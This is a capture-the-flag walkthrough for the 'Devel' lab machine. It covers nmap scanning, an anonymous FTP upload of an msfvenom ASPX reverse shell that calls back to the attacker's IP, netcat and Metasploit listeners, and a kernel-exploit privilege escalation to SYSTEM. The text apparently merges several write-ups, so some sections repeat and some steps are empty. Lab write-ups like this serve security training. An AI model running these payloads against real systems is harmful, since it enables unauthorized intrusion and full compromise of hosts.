🍈Devel

Below are the steps involved for Devel Machine CTF

Enumeration and Scanning (Information Gathering).
Initial Foothold.
Privilege Escalation.

Enumeration

Let’s run a nmap scan on default ports to see what services are running on the target system.

#nmap -sC -sV -oA nmap/Devel1 10.10.10.5

-sC - Default scripts

-sV - Service version scanning

-oA - To save the output

Next, we will try using nmap script scanning to identify the vulnerabilities identified in the target machine.

nmap -sV -A -p- --script vuln 10.10.10.5

nmap -n -v -sT -A 10.10.10.5 --script vuln

-sV - To Identify the service version

-A - To do the aggressive scan

-p- - All ports scanning

--script vuln - script scanning

nmap -sC -sV -O -oA nmap/devel 10.10.10.5

$ nmap -sC -sV -p- -T4 -oN devel_full_scan 10.10.10.5

We found FTp running on port 21 and HTTP running on port 80. We have anonymous login allowed on Target’s FTP. Also, Nmap lists the contents of the FTP server which shows iisstart.htm, welcome.png and a directory aspnet_client. Let’s get on to the HTTP server and see what we have on it.

We have IIS7 default page. If we look into the source of the web page. We can see

We can see that the image welcome.png is included without any full path. Which means that the image is in the same directory where the web page is hosted. And we also noticed the image welcome.png in our FTP server. So, let’s login to FTP and try putting any files there if we have the write access and see if we can access those files from the web server.

ftp 10.10.10.5

let’s see if I can access it on the web.

Yes we are able to access the test page.Let’s simply generate an aspx shell and upload it on the web server. This way we can get a reverse shell probably.

Initial Foothold

Let’s generate an ASPX reverse shell using MSFVENOM.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.4" LPORT=4444 -f aspx > shell.aspx

Let’s upload it from FTP.

Let’s start a listener on port that we used to generate the reverse shell.

rlwrap nc -lvnp 4444

And we got a reverse shell.

Privilege Escalation

Let’s see what user shell we have currently.

whoami

Right now, we are the default user for IIS. We may have very limited rights on the machine. Let’s enumerate the machine from within to get better insight. First, let’s see systeminfo.

systeminfo

We can see that it’s a Windows 7 Enterprise, build 6.1.7600.

Let’s see if we have any privilege escalation exploits for this version. By a simple Google search, I got this exploit:

WindowsExploits/MS11-046/40564.c at master · abatchy17/WindowsExploitsGitHub

Lets try using msfconsole option to capture the flag

Nmap revealed that port 21 and 80 are open. Microsoft ftp Server is running over port 21 and Microsoft IIS Webserver is running over port 80. Nmap script ftp-anon discovered that anonymous login is allowed on ftp. So as usual, tried to login with the credential anonymous : anonymous.

$ ftp 10.10.10.5

User ID :anonymous

Password :anonymous

ftp > ls

Once logged in ftp server anonymously tried to list the content of the ftp folder and found files iisstart.htm & welcome.png inside it. Guessed these may be webserver’s files, which is running over port 80. Ongoing to URL http://10.10.10.5/iisstart.htm and http://10.10.10.5/welcome.png it is confirmed that we have access to all the files of this folder. Tried to upload a simple txt file through ftp and successfully uploaded it and uploaded file can be accessed at url http://10.10.10.5/myfile.txt . Then tried to upload php webshell shell.php. It uploaded successfully but if we try to access, the shell at URL http://10.10.10.5/shell.php where it is supposed to present but, it gives 404 error.

This error may be due to php is not installed on the webserver. Since, it is IIS server so it generally host asp or apsx file. Tried to upload an aspx file and the uploaded file can be easily accessed directly at the url http://10.10.10.5/aspxfile.aspx. So here, we have confirmed that we can upload an aspx file and can access it. So made an aspx reverse shell using msfvenom and uploaded it on ftp server. You can get a list of reverse shell cheat sheet.

Create Reverse Shell Using below command.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx > reverse.aspx

https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom

Note: If you are getting error using non-staged payload windows/meterpreter_reverse_tcp you can use staged payload windows/meterpreter/reverse_tcp in your reverse.aspx shell. But make sure to set the same payload in the exploit/multi/handler listener.

Upload the payload To FTP

ftp> put reverse.aspx

Once we have uploaded our reverse shell reverse.aspx to the webserver our next step should be to start our listener on msfconsole and set the payload. Therefore, started exploit/multi/handler on msfconsole and set the payload to it in one window. And executed the URL http://10.10.10.5/reverse.aspx in another window. You can also open the URL in the browser to access it.

Start Listener

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 10.10.16.2

msf5 exploit(multi/handler) > set LPORT 4444

msf5 exploit(multi/handler) > exploit

Open URL

curl http://10.10.10.5/reverse.apsx or you can open the link directly to the browser

We can clearly see that we got a meterpreter shell. Ran some basic meterpreter commands.

meterpreter > sysinfo

meterpreter > getuid

Meterpreter command getuid returns that current user is IIS APPPOOL\Web, which means we have to escalate the privilege to admin to get root flag.

Privilege Escalation

Finding PrivEsc Vector

To find privilege escalation vector used post/multi/recon/local_exploit_suggester. This post exploitation module will gather all the Kernel Exploit to which the given machine is vulnerable to. To use this exploit, do the following:

we can find out what exploit we can use to get the root shell using background session.

to move to backgrounds session below commands

type background # to background the meterpreter session.

meterpreter > CTRL + Z # to background the meterpreter session.

Search local_exploit - This will show which exploit we can use for this vulnerabilities.

we have got the above exploit based on the session which we can get the root shell using this above exploit

0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester

Another way to identify the exploit.

msf5 exploit(multi/handler) > search suggester

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 3

msf5 post(multi/recon/local_exploit_suggester) > exploit

This will gather the entire kernel exploit whose patch is not installed in the devel computer.

local_exploit_suggester enlist many number of local privilege escalation exploit. So here, our Privilege Escalation Vector can be a Kernel Exploit. Tried to use each module one by one and windows/local/ms14_058_track_popup_menu module was the right one which escalate the privilege to the administrator.

msf5 post(multi/recon/local_exploit_suggester) > use windows/local/ms14_058_track_popup_menu

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.16.2

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 3

msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

meterpreter > getuid

We are NT AUTHORITY\SYSTEM now, which is the highest privilege in windows OS, even higher then Admin account. It is time to grab the flags. But let’s upgrade our shell to cmd prompt so that we can run more windows command.

Upgrading The Shell

Navigate the user and root directories

Capture the User Flag

Capture the Root Flag

Devel — without Metasploit

Create shell payload using below command

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4242 -f aspx > shell.aspx

Connect FTP and upload the shell.aspx payload and access via web browser and parallelly run the netcat command.

run the command in terminal

rlwrap nc -lvnp 4242

Once command executed you will get the shell

And we got a reverse shell.

Privilege Escalation

Let’s see what user shell we have currently.

Right now, we are the default user for IIS. We may have very limited rights on the machine. Let’s enumerate the machine from within to get better insight. First, let’s see systeminfo.

systeminfo